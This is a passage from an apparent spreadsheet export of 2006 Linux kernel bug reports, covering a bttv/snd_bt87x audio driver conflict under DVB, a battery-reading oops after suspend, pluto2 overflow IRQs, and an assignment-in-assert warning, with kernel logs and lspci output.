109e:036e (rev 11) 0000:02:0c.1 0480: 109e:0878 (rev 11) 0000:02:0d.0 0400: 109e:036e (rev 11) 0000:02:0d.1 0480: 109e:0878 (rev 11) 0000:02:0e.0 0280: 1814:0201 (rev 01) Software Environment: Problem Description: In kernel 2.6.15 Without dvb drivers and patch provided in bug http://bugzilla.kernel.org/show_bug.cgi?id=5851 snd_btx are detected (full log in attach) --------- Linux video capture interface: v1.00 bttv: driver version 0.9.16 loaded bttv: using 8 buffers with 2080k (520 pages) each for capture bttv: Bt8xx card found (0). PCI: Enabling device 0000:02:0c.0 (0004 -&gt; 0006) ACPI: PCI Interrupt Link [LNKE] enabled at IRQ 11 PCI: setting IRQ 11 as level-triggered ACPI: PCI Interrupt 0000:02:0c.0[A] -&gt; Link [LNKE] -&gt; GSI 11 (level, low) -&gt; IRQ 11 bttv0: Bt878 (rev 17) at 0000:02:0c.0, irq: 11, latency: 32, mmio: 0xef000000 bttv0: using: Jetway TV/Capture JW-TV878-FBK, Kworld KW-TV878RF [card=78,insmod option] bttv0: gpio: en=00000000, out=00000000 in=003fffff [init] bttv0: using tuner=5 bttv0: registered device video0 bttv0: registered device vbi0 bttv0: registered device radio0 bttv0: PLL: 28636363 =&gt; 35468950 .. ok bttv: Bt8xx card found (1). PCI: Enabling device 0000:02:0d.0 (0004 -&gt; 0006) ACPI: PCI Interrupt Link [LNKF] enabled at IRQ 11 ACPI: PCI Interrupt 0000:02:0d.0[A] -&gt; Link [LNKF] -&gt; GSI 11 (level, low) -&gt; IRQ 11 bttv1: Bt878 (rev 17) at 0000:02:0d.0, irq: 11, latency: 32, mmio: 0xee000000 bttv1: detected: AVermedia AverTV DVB-T 771 [card=123], PCI subsystem ID is 1461:0771 bttv1: using: AVerMedia AVerTV DVB-T 771 [card=123,autodetected] bttv1: gpio: en=00000000, out=00000000 in=00feff0f [init] bttv1: using tuner=4 bttv1: registered device video1 bttv1: registered device vbi1 bttv1: PLL: 28636363 =&gt; 35468950 .. ok bttv1: add subdevice "remote1" bttv1: add subdevice "dvb1" input: i2c IR (Hauppauge) as /class/input/input0 input: bttv IR (card=123) as /class/input/input1 tuner 0-0060: All bytes are equal. It is not a TEA5767 tuner 0-0060: chip found @ 0xc0 (bt878 #0 [sw]) tuner 0-0060: type set to 5 (Philips PAL_BG (FI1216 and compatibles)) ... ... Advanced Linux Sound Architecture Driver Version 1.0.10rc3 (Mon Nov 07 13:30:21 2005 UTC). juampe debug card 0x109e:0x878-0x00:0x00 unknown card 0x00:0x00, using default rate 32000 please mail id, board name, and, if it works, the correct digital_rate option to &lt;alsa-devel@lists.sf.net&gt; juampe rate 32000 PCI: Enabling device 0000:02:0c.1 (0004 -&gt; 0006) ACPI: PCI Interrupt 0000:02:0c.1[A] -&gt; Link [LNKE] -&gt; GSI 11 (level, low) -&gt; IRQ 11 juampe Probe is OK&lt;5&gt;juampe debug card 0x109e:0x878-0x1461:0x771 ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 10 PCI: setting IRQ 10 as level-triggered ACPI: PCI Interrupt 0000:00:1f.5[B] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 PCI: Setting latency timer of device 0000:00:1f.5 to 64 input: AT Translated Set 2 keyboard as /class/input/input2 intel8x0_measure_ac97_clock: measured 54560 usecs intel8x0: clocking to 48000 ALSA device list: #0: Intel 82801BA-ICH2 with ALC200,200P at 0xb800, irq 10 #1: Brooktree Bt878 at 0xee800000, irq 11 #2: Virtual MIDI Card 1 --------- The 'juampe' prink are debuging info to probe methods in snd_bt87x Now, when i enable DVB support to AV711 CONFIG_DVB=y CONFIG_DVB_CORE=y CONFIG_DVB_BT8XX=y CONFIG_DVB_CX24110=y CONFIG_DVB_VES1X93=y CONFIG_DVB_SP887X=y CONFIG_DVB_NXT6000=y CONFIG_DVB_MT352=y CONFIG_DVB_OR51211=y CONFIG_DVB_OR51132=y CONFIG_DVB_LGDT330X=y ----- Linux video capture interface: v1.00 bttv: driver version 0.9.16 loaded bttv: using 8 buffers with 2080k (520 pages) each for capture bttv: Bt8xx card found (0). PCI: Enabling device 0000:02:0c.0 (0004 -&gt; 0006) ACPI: PCI Interrupt Link [LNKE] enabled at IRQ 11 PCI: setting IRQ 11 as level-triggered ACPI: PCI Interrupt 0000:02:0c.0[A] -&gt; Link [LNKE] -&gt; GSI 11 (level, low) -&gt; IRQ 11 bttv0: Bt878 (rev 17) at 0000:02:0c.0, irq: 11, latency: 32, mmio: 0xef000000 bttv0: using: Jetway TV/Capture JW-TV878-FBK, Kworld KW-TV878RF [card=78,insmod option] bttv0: gpio: en=00000000, out=00000000 in=003fffff [init] bttv0: using tuner=5 bttv0: registered device video0 bttv0: registered device vbi0 bttv0: registered device radio0 bttv0: PLL: 28636363 =&gt; 35468950 .. ok bttv: Bt8xx card found (1). PCI: Enabling device 0000:02:0d.0 (0004 -&gt; 0006) ACPI: PCI Interrupt Link [LNKF] enabled at IRQ 11 ACPI: PCI Interrupt 0000:02:0d.0[A] -&gt; Link [LNKF] -&gt; GSI 11 (level, low) -&gt; IRQ 11 bttv1: Bt878 (rev 17) at 0000:02:0d.0, irq: 11, latency: 32, mmio: 0xee000000 bttv1: detected: AVermedia AverTV DVB-T 771 [card=123], PCI subsystem ID is 1461:0771 bttv1: using: AVerMedia AVerTV DVB-T 771 [card=123,insmod option] bttv1: gpio: en=00000000, out=00000000 in=00feff0f [init] bttv1: using tuner=4 bttv1: registered device video1 bttv1: registered device vbi1 bttv1: PLL: 28636363 =&gt; 35468950 .. ok bttv1: add subdevice "remote1" bttv1: add subdevice "dvb1" input: i2c IR (Hauppauge) as /class/input/input0 input: bttv IR (card=123) as /class/input/input1 tuner 0-0060: All bytes are equal. It is not a TEA5767 tuner 0-0060: chip found @ 0xc0 (bt878 #0 [sw]) tuner 0-0060: type set to 5 (Philips PAL_BG (FI1216 and compatibles)) bt878: AUDIO driver version 0.0.0 loaded bt878: Bt878 AUDIO function found (0). PCI: Enabling device 0000:02:0c.1 (0004 -&gt; 0006) ACPI: PCI Interrupt 0000:02:0c.1[A] -&gt; Link [LNKE] -&gt; GSI 11 (level, low) -&gt; IRQ 11 bt878(0): Bt878 (rev 17) at 02:0c.1, irq: 11, latency: 32, memory: 0xee800000 bt878: Bt878 AUDIO function found (1). PCI: Enabling device 0000:02:0d.1 (0004 -&gt; 0006) ACPI: PCI Interrupt 0000:02:0d.1[A] -&gt; Link [LNKF] -&gt; GSI 11 (level, low) -&gt; IRQ 11 bt878(1): Bt878 (rev 17) at 02:0d.1, irq: 11, latency: 32, memory: 0xed800000 DVB: registering new adapter (bttv1). DVB: registering frontend 0 (Zarlink MT352 DVB-T)... ... ... Advanced Linux Sound Architecture Driver Version 1.0.10rc3 (Mon Nov 07 13:30:21 2005 UTC). ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 10 PCI: setting IRQ 10 as level-triggered ACPI: PCI Interrupt 0000:00:1f.5[B] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 PCI: Setting latency timer of device 0000:00:1f.5 to 64 input: AT Translated Set 2 keyboard as /class/input/input2 intel8x0_measure_ac97_clock: measured 54279 usecs intel8x0: clocking to 48000 ALSA device list: #0: Intel 82801BA-ICH2 with ALC200,200P at 0xb800, irq 10 #2: Virtual MIDI Card 1 ----- Notice that 'juampe' debug printk in snd_bt87x probe not appears and DVB diver get the resource ... bt878(0): Bt878 (rev 17) at 02:0c.1, irq: 11, latency: 32, memory: 0xee800000 bt878: Bt878 AUDIO function found (1).</t>
  </si>
  <si>
    <t>oops when reading battery info</t>
  </si>
  <si>
    <t>2006-01-15 07:14 UTC</t>
  </si>
  <si>
    <t>2006-02-15 21:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13 Distribution: Fedora Core 4 Hardware Environment: IBM T42P Software Environment: Vanilla 2.6.15 Problem Description: I have 'gkrellm' application permanently running. One of its tasks is to monitor battery status. This is achieved by reading ACPI /proc files. After some number of suspend/resume cycles, grkellm stalls; System continue to run; eventually it ceases to suspend. /var/log/messages gives: Jan 15 15:42:20 vkondra-mobl kernel: Unable to handle kernel paging request at virtual address 6b6b6b8b Jan 15 15:42:20 vkondra-mobl kernel: printing eip: Jan 15 15:42:20 vkondra-mobl kernel: c01340f3 Jan 15 15:42:20 vkondra-mobl kernel: *pde = 00000000 Jan 15 15:42:20 vkondra-mobl kernel: Oops: 0000 [#1] Jan 15 15:42:20 vkondra-mobl kernel: PREEMPT Jan 15 15:42:20 vkondra-mobl kernel: Modules linked in: nls_cp437 nls_utf8 smbfs nls_base bluetooth cpufreq_stats cpufreq_conserva tive cpufreq_performance cpufreq_powersave cpufreq_ondemand speedstep_centrino freq_table microcode evdev ipv6 lp autofs4 sunrpc d m_mirror dm_mod video thermal processor ibm_acpi fan container button battery ac parport_pc parport snd_intel8x0m snd_seq_dummy sn d_intel8x0 snd_ac97_codec snd_ac97_bus snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss floppy pcmc ia ipw2200 snd_pcm usbhid crc32 ieee80211 ieee80211_crypt snd_timer snd soundcore yenta_socket i2c_i801 e1000 firmware_class snd_p age_alloc rsrc_nonstatic pcmcia_core ehci_hcd uhci_hcd i2c_core intel_agp agpgart hw_random usbcore ext3 jbd Jan 15 15:42:20 vkondra-mobl kernel: CPU: 0 Jan 15 15:42:20 vkondra-mobl kernel: EIP: 0060:[&lt;c01340f3&gt;] Not tainted VLI Jan 15 15:42:20 vkondra-mobl kernel: EFLAGS: 00010286 (2.6.15) Jan 15 15:42:20 vkondra-mobl kernel: EIP is at audit_inode+0x81/0xb2 Jan 15 15:42:20 vkondra-mobl kernel: eax: 00000101 ebx: ee671778 ecx: 00000001 edx: ee671778 Jan 15 15:42:20 vkondra-mobl kernel: esi: 6b6b6b6b edi: d97fb000 ebp: ee279eb8 esp: ee279ea8 Jan 15 15:42:20 vkondra-mobl kernel: ds: 007b es: 007b ss: 0068 Jan 15 15:42:20 vkondra-mobl kernel: Process gkrellm (pid: 2971, threadinfo=ee278000 task=eee82a90) Jan 15 15:42:20 vkondra-mobl kernel: Stack: 00000101 ee278000 ee279f44 d97fb000 ee279ed4 c015cd8b 00000101 fffffffe Jan 15 15:42:20 vkondra-mobl kernel: ee279f44 00000101 ffffffe9 ee279eec c015cdd4 d97fb000 d97fb000 ee279f44 Jan 15 15:42:20 vkondra-mobl kernel: 00000008 ee279efc c015ce10 00008001 00000000 ee279f38 c015d464 00008001 Jan 15 15:42:20 vkondra-mobl kernel: Call Trace: Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c0103bcc&gt;] show_stack+0x7c/0x85 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c0103d11&gt;] show_registers+0x123/0x197 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c0103ecb&gt;] die+0xd2/0x145 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c0292f45&gt;] do_page_fault+0x373/0x521 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c01038cb&gt;] error_code+0x4f/0x54 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c015cd8b&gt;] path_lookup+0x179/0x183 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c015cdd4&gt;] __path_lookup_intent_open+0x3f/0x6e Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c015ce10&gt;] path_lookup_open+0xd/0xf Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c015d464&gt;] open_namei+0x63/0x588 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c014f156&gt;] filp_open+0x1c/0x31 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c014f3ee&gt;] do_sys_open+0x37/0xa8 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c014f470&gt;] sys_open+0x11/0x13 Jan 15 15:42:20 vkondra-mobl kernel: [&lt;c0102d99&gt;] syscall_call+0x7/0xb Jan 15 15:42:20 vkondra-mobl kernel: Code: 74 04 39 f8 74 1a 83 f9 0c 7f 4b 8d 41 01 89 ca 89 43 38 89 c8 c1 e0 05 c7 44 18 3c 00 00 00 00 8b 45 f0 c1 e2 05 01 da 89 42 58 &lt;8b&gt; 46 20 89 42 40 8b 86 c4 00 00 00 8b 40 08 89 42 44 8b 46 28 Steps to reproduce: run 2.6.15; run X11 with 'gkrellm' and battery monitor enabled. Perform several suspend/resume cycles. Monitor /var/log/messages.</t>
  </si>
  <si>
    <t>When playing DVB stream on P4 celeron (128kB cache) picture got broken reading info from battery</t>
  </si>
  <si>
    <t>2.6.18 and all lower</t>
  </si>
  <si>
    <t>2006-01-16 03:54 UTC</t>
  </si>
  <si>
    <t>2007-05-23 10:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian testing Hardware Environment: Intel Pentium 4 celeron, i852 chipset Software Environment: Debian testing, kernel 2.6.15 Problem Description: When playing on P4 Celeron, picture often got bad and in dmesg I see: Jan 13 20:50:52 notas kernel: pluto2 0000:03:00.0: overflow irq (10) Jan 13 20:50:53 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 20:50:56 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 20:50:56 notas kernel: pluto2 0000:03:00.0: overflow irq (8) Jan 13 20:50:57 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 20:50:57 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 20:50:57 notas kernel: pluto2 0000:03:00.0: overflow irq (8) Jan 13 20:51:00 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 20:51:05 notas kernel: pluto2 0000:03:00.0: overflow irq (9) Jan 13 20:51:08 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:04 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:13 notas kernel: pluto2 0000:03:00.0: overflow irq (11) Jan 13 22:51:13 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:21 notas kernel: pluto2 0000:03:00.0: overflow irq (11) Jan 13 22:51:21 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:22 notas kernel: pluto2 0000:03:00.0: overflow irq (11) Jan 13 22:51:24 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:25 notas kernel: pluto2 0000:03:00.0: overflow irq (11) Jan 13 22:51:25 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:25 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:25 notas kernel: pluto2 0000:03:00.0: overflow irq (10) Jan 13 22:51:28 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:28 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:28 notas kernel: pluto2 0000:03:00.0: overflow irq (12) Jan 13 22:51:29 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:29 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:29 notas kernel: pluto2 0000:03:00.0: overflow irq (11) Jan 13 22:51:29 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Jan 13 22:51:29 notas kernel: pluto2 0000:03:00.0: overflow irq (1) Steps to reproduce: Play on the same hardware (Acer TravelMate 242) notas:/home/cijoml# lspci -vvv 0000:00:00.0 Host bridge: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at &lt;unassigned&gt; (32-bit, prefetchable) Capabilities: [40] #09 [0105] 0000:00:00.1 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 0000:00:00.3 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 0000:00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) (prog-if 00 [VGA]) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 11 Region 0: Memory at e8000000 (32-bit, prefetchable) [size=128M] Region 1: Memory at e0000000 (32-bit, non-prefetchable) [size=512K] Region 2: I/O ports at 1800 [size=8] Capabilities: [d0] Power Management version 1 Flags: PMEClk- DSI+ D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Region 0: Memory at f0000000 (32-bit, prefetchable) [size=128M] Region 1: Memory at e0080000 (32-bit, non-prefetchable) [size=512K] Capabilities: [d0] Power Management version 1 Flags: PMEClk- DSI+ D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 03) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 11 Region 4: I/O ports at 1820 [size=32] 0000:00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 03) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at 1840 [size=32] 0000:00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 03) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 10 Region 4: I/O ports at 1860 [size=32] 0000:00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 03) (prog-if 20 [EHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 11 Region 0: Memory at e0100000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] #0a [2080] 0000:00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 83) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=64 I/O behind bridge: 00003000-00003fff Memory behind bridge: e0200000-e02fffff Prefetchable memory behind bridge: 30000000-34ffffff BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 0000:00:1f.0 ISA bridge: Intel Corporation 82801DBM (ICH4-M) LPC Interface Bridge (rev 03) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 0000:00:1f.1 IDE interface: Intel Corporation 82801DBM (ICH4-M) IDE Controller (rev 03) (prog-if 8a [Master SecP PriP]) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at &lt;unassigned&gt; Region 1: I/O ports at &lt;unassigned&gt; Region 2: I/O ports at &lt;unassigned&gt; Region 3: I/O ports at &lt;unassigned&gt; Region 4: I/O ports at 1810 [size=16] Region 5: Memory at 35000000 (32-bit, non-prefetchable) [size=1K] 0000:00:1f.3 SMBus: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller (rev 03) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 10 Region 4: I/O ports at 1880 [size=32] 0000:00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 03) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 10 Region 0: I/O ports at 1c00 [size=256] Region 1: I/O ports at 18c0 [size=64] Region 2: Memory at e0100c00 (32-bit, non-prefetchable) [size=512] Region 3: Memory at e0100800 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 03) (prog-if 00 [Generic]) Subsystem: Acer Incorporated [ALI]: Unknown device 0038 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 10 Region 0: I/O ports at 2400 [size=256] Region 1: I/O ports at 2000 [size=128] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:02:04.0 CardBus bridge: Texas Instruments PCI1520 PC card Cardbus Controller (rev 01) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168, Cache Line Size: 0x20 (128 bytes) Interrupt: pin A routed to IRQ 10 Region 0: Memory at e0201000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=03, subordinate=06, sec-latency=176 Memory window 0: 30000000-31fff000 (prefetchable) Memory window 1: 36000000-37fff000 I/O window 0: 00003400-000034ff I/O window 1: 00003800-000038ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 0000:02:04.1 CardBus bridge: Texas Instruments PCI1520 PC card Cardbus Controller (rev 01) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168, Cache Line Size: 0x20 (128 bytes) Interrupt: pin B routed to IRQ 10 Region 0: Memory at e0202000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=07, subordinate=0a, sec-latency=176 Memory window 0: 32000000-33fff000 (prefetchable) Memory window 1: 38000000-39fff000 I/O window 0: 00003c00-00003cff I/O window 1: 00001400-000014ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 0000:02:0a.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Acer Incorporated [ALI]: Unknown device 0039 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (8000ns min, 16000ns max) Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at 3000 [size=256] Region 1: Memory at e0200000 (32-bit, non-prefetchable) [size=256] Expansion ROM at 34000000 [disabled] [size=64K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME-</t>
  </si>
  <si>
    <t>assigment in assert</t>
  </si>
  <si>
    <t>2006-01-16 06:20 UTC</t>
  </si>
  <si>
    <t>David Binderman</t>
  </si>
  <si>
    <t>2006-04-15 06:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce: I just tried to compile kernel 2.6.15.1 with the Intel C compiler. It said sound/pci/cs46xx/dsp_spos_scb_lib.c(673): warning #187: use of "=" where "==" may have been intended The source code is snd_assert (rate = 48000); I agree with the compiler. Suggest new code snd_assert (rate == 48000);</t>
  </si>
  <si>
    <t>2.6.16-rc1</t>
  </si>
  <si>
    <t>Cristian Barean</t>
  </si>
  <si>
    <t>drivers/usb/misc/auerswald.c needs 2 more lines to support 2 more TK-Devices</t>
  </si>
  <si>
    <t>2006-01-17 08:40 UTC</t>
  </si>
  <si>
    <t>Thomas J</t>
  </si>
  <si>
    <t>2006-07-09 15:47 UTC</t>
  </si>
  <si>
